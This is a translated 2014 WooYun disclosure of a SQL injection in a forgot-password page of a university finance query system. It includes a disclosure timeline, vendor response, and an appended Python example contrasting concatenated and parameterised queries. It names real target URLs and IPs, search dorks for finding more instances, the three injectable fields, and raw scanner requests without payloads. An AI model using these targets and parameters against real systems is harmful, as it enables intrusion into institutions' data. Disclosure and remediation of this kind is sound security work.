
Vulnerability summary

Defect ID: wooyun-2014-081081

Title: Generic SQL injection vulnerability in a query system

Vendor: 上海财大科技发展公司 (Shanghai University of Finance and Economics Technology Development Company)

Author: Mr.leo

Submitted: 2014-10-29 16:24

Fixed: 2015-01-27 16:26

Published: 2015-01-27 16:26

Type: SQL injection

Severity: High

Self-assessed Rank: 15

Status: Handed over to a third-party partner organisation (CNCERT, the national internet emergency response centre) for handling

Source: http://www.wooyun.org; for questions or assistance contact [email protected]



Vulnerability details

Disclosure status:

2014-10-29: Details sent to the vendor, awaiting vendor handling
2014-11-03: Vendor confirmed; details disclosed to the vendor only
2014-11-06: Details opened to third-party security partners
2014-12-28: Details disclosed to core white hats and domain experts
2015-01-07: Details disclosed to regular white hats
2015-01-17: Details disclosed to intern white hats
2015-01-27: Details disclosed to the public

Brief description:

BOOM!!

Details:

Vendor: 上海财大科技发展公司 (Shanghai University of Finance and Economics Technology Development Company; per Baidu Wenku material)
Baidu search keyword: 科发网上查询系统 (Kefa online query system)
http://www.baidu.com/s?wd=科发网上查询系统&ie=utf-8
http://cn.bing.com/search?q=科发网上查询系统&ie=utf-8

[Screenshots: 001.png, 002.png]


Cases:
http://cwch.ahu.edu.cn/querynetweb/wjmm.aspx
http://61.142.174.200/cwc/KFweb/wjmm.aspx
http://gzcx.tynu.edu.cn/kfweb/wjmm.aspx
http://221.5.51.228/cjb/wjmm.aspx
http://210.45.92.21/wjmm.aspx
http://www.shcdkf.com/kfweb/wjmm.aspx
http://cwc.sxufe.edu.cn/KfWeb/wjmm.aspx
All three parameters, TextBox_xm, TextBox_sfz and TextBox_yhm, are injectable; TextBox_xm is used as the example here.
Five cases as proof:
1. http://cwch.ahu.edu.cn/querynetweb/wjmm.aspx
POST http://cwch.ahu.edu.cn/querynetweb/wjmm.aspx HTTP/1.1
Host: cwch.ahu.edu.cn
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://cwch.ahu.edu.cn/querynetweb/wjmm.aspx
Cookie: ASP.NET_SessionId=kwogas453javiuqbykovnhuo; K_V_D_ASP.NET_SessionId=apcookfgcoefkappdpddcafgebennhohfnninmbclohkmniaeebfinbioffiimlaicmimobhajok
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 271
__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUJOTM3NDU0MDU3ZGSC3oXtb6olw1bKF%2FNkUya696jmaA%3D%3D&TextBox_xm=1&TextBox_sfz=2&TextBox_yhm=3&Button_tj=%CC%E1%BD%BB&__EVENTVALIDATION=%2FwEWBgLe1OSNAwLh04iPCwLw7pu8DgKvzdH%2BCALWyuD7AgLmyryBDAiFep3lc0k5gWsZKG2GzYRWcWOE

[Screenshots: 003.png, 004.png]


2. http://61.142.174.200/cwc/KFweb/wjmm.aspx
POST /cwc/KFweb/wjmm.aspx HTTP/1.1
Pragma: no-cache
Cache-Control: no-cache
Referer: http://61.142.174.200/cwc/KFweb/wjmm.aspx
Content-Length: 288
Content-Type: application/x-www-form-urlencoded
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: 082119f75623eb7abd7bf357698ff66c
Acunetix-Aspect-Queries: filelist;aspectalerts
Cookie: ASP.NET_SessionId=bcyxzd45zx4qnh553bcgefq3
Host: 61.142.174.200
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
Button_cz=%d6%d8%d6%c3&Button_tj=%cc%e1%bd%bb&TextBox_sfz=1&TextBox_xm=1&TextBox_yhm=1&__EVENTARGUMENT=&__EVENTTARGET=&__EVENTVALIDATION=/wEWBgKGwdCsBgLh04iPCwLw7pu8DgKvzdH%2bCALWyuD7AgLmyryBDMe91X4sMkFdyUIlWmAsGYe8ZoVE&__VIEWSTATE=/wEPDwUJOTM3NDU0MDU3ZGR5P7UyiNMYg8NlcpcpuRkEaUl1Ow%3d%3d

[Screenshots: 005.png, 006.png]


3. http://gzcx.tynu.edu.cn/kfweb/wjmm.aspx
POST /kfweb/wjmm.aspx HTTP/1.1
Pragma: no-cache
Cache-Control: no-cache
Referer: http://gzcx.tynu.edu.cn/kfweb/wjmm.aspx
Content-Length: 290
Content-Type: application/x-www-form-urlencoded
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: 082119f75623eb7abd7bf357698ff66c
Acunetix-Aspect-Queries: filelist;aspectalerts
Cookie: ASP.NET_SessionId=oc5kwrnykdrfdn55pcd21055
Host: gzcx.tynu.edu.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
Button_cz=%d6%d8%d6%c3&Button_tj=%cc%e1%bd%bb&TextBox_sfz=1&TextBox_xm=1&TextBox_yhm=1&__EVENTARGUMENT=&__EVENTTARGET=&__EVENTVALIDATION=/wEWBgLq2MbEBQLh04iPCwLw7pu8DgKvzdH%2bCALWyuD7AgLmyryBDKp3r77uz2yPpfcNFXI3isVTKLNP&__VIEWSTATE=/wEPDwUJOTM3NDU0MDU3ZGQNe1wC%2b6bTd4MUAkQIuJzkQdgMhA%3d%3d

[Screenshots: 007.png, 008.png]


4. http://221.5.51.228/cjb/wjmm.aspx
POST /cjb/wjmm.aspx HTTP/1.1
Pragma: no-cache
Cache-Control: no-cache
Referer: http://221.5.51.228/cjb/wjmm.aspx
Content-Length: 290
Content-Type: application/x-www-form-urlencoded
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: 082119f75623eb7abd7bf357698ff66c
Acunetix-Aspect-Queries: filelist;aspectalerts
Cookie: ASP.NET_SessionId=xieqrheghgjoar45r2aopx55
Host: 221.5.51.228
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
Button_cz=%d6%d8%d6%c3&Button_tj=%cc%e1%bd%bb&TextBox_sfz=1&TextBox_xm=1&TextBox_yhm=1&__EVENTARGUMENT=&__EVENTTARGET=&__EVENTVALIDATION=/wEWBgKOlbTNBwLh04iPCwLw7pu8DgKvzdH%2bCALWyuD7AgLmyryBDKO%2bODdAQ/uALsU7wCu1bAkKwmz9&__VIEWSTATE=/wEPDwUJOTM3NDU0MDU3ZGTnp9oFQuKltgpOexX2KbOSio0VVA%3d%3d

[Screenshots: 111.png, 112.png]


5. http://210.45.92.21/wjmm.aspx
POST /wjmm.aspx HTTP/1.1
Pragma: no-cache
Cache-Control: no-cache
Referer: http://210.45.92.21/wjmm.aspx
Content-Length: 288
Content-Type: application/x-www-form-urlencoded
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: 082119f75623eb7abd7bf357698ff66c
Acunetix-Aspect-Queries: filelist;aspectalerts
Cookie: ASP.NET_SessionId=2eqrjqf3vxptkry1o0az42eu
Host: 210.45.92.21
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
Button_cz=%d6%d8%d6%c3&Button_tj=%cc%e1%bd%bb&TextBox_sfz=1&TextBox_xm=1&TextBox_yhm=1&__EVENTARGUMENT=&__EVENTTARGET=&__EVENTVALIDATION=/wEWBgLLqZWEBQLh04iPCwLw7pu8DgKvzdH%2bCALWyuD7AgLmyryBDPT5vIGXydiQUva6RJDvOuVPqXt9&__VIEWSTATE=/wEPDwUJOTM3NDU0MDU3ZGQhkZHE52jodq4/B9xIgUnfTQQs9A%3d%3d

[Screenshots: 113.png, 115.png]


Proof of vulnerability:

Already proven above

Remediation:

Filter the inputs
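As an added example (not the report's or the vendor's code), the identity check a forgot-password form like wjmm.aspx would run on the three fields, first as a concatenated query and then with bound parameters plus an allow-list on the ID-number field. The table and column names, the field meanings (xm = name, sfz = ID number, yhm = username) and the sample rows are assumptions constructed for the example.

```python
import re
import sqlite3

# Added example, not the vendor's code. Models the identity check a forgot-password
# form would run on the three fields from the report: TextBox_xm, TextBox_sfz and
# TextBox_yhm. Table/column names and the field meanings (xm = name, sfz = ID number,
# yhm = username) are assumptions; the rows are constructed sample data.


def build_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, xm TEXT, sfz TEXT, yhm TEXT)")
    conn.executemany("INSERT INTO users (xm, sfz, yhm) VALUES (?, ?, ?)", [
        ("O'Brien", "110101199001011234", "obrien"),      # name containing an apostrophe
        ("Zhang San", "110101199002022345", "zhangsan"),
    ])
    return conn


def verify_unsafe(conn, xm, sfz, yhm):
    # Vulnerable pattern: the form values are spliced into the SQL text, so a quote
    # in xm, sfz or yhm is parsed as SQL instead of being compared as data.
    sql = ("SELECT id FROM users WHERE xm='" + xm + "' AND sfz='" + sfz
           + "' AND yhm='" + yhm + "'")
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


SFZ_RE = re.compile(r"^[0-9]{17}[0-9Xx]$")   # PRC ID number: 17 digits + check digit


def verify_safe(conn, xm, sfz, yhm):
    # Hardened: allow-list the structured field, then bind all three as parameters
    # so the statement shape is fixed before any user data reaches the database.
    if not SFZ_RE.match(sfz):
        return None
    sql = "SELECT id FROM users WHERE xm=? AND sfz=? AND yhm=?"
    row = conn.execute(sql, (xm, sfz, yhm)).fetchone()
    return row[0] if row else None


def unsafe_breaks_on(conn, xm, sfz, yhm):
    # True when the concatenated statement is no longer valid SQL, the error a
    # scanner keys on; the parameterized version never reaches this state.
    try:
        verify_unsafe(conn, xm, sfz, yhm)
        return False
    except sqlite3.OperationalError:
        return True
```

A legitimate name with an apostrophe is enough to show the difference: the concatenated query raises a database error, while the parameterized query matches the row.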

Copyright notice: please credit the source when reposting: Mr.leo@乌云 (WooYun)


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 17

Confirmed: 2014-11-03 11:24

Vendor reply:

Latest status:

None yet